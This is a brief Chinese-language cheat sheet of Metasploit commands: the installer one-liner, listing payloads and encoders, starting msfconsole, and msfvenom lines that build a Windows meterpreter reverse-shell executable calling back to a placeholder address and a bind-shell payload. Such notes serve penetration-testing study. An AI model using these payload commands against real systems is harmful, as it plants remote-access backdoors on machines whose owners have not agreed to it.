metasploit使用笔记
0x00
Linux安装
1 | curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall |
0x01
查看metasploit 所有的payload
1 | msfvenom -l payloads [payloads, encoders, nops, platforms, archs, encrypt, formats, all] |
生成反弹metasploit会话的可执行文件
1 | msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=1.1.1.1 LPORT=24444 -f exe > shell.exe |
正向会话
1 | msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f raw -o msf1.bin |
监听会话
1 | msfconsole |
查看编码器
1 | msfvenom -l encoders |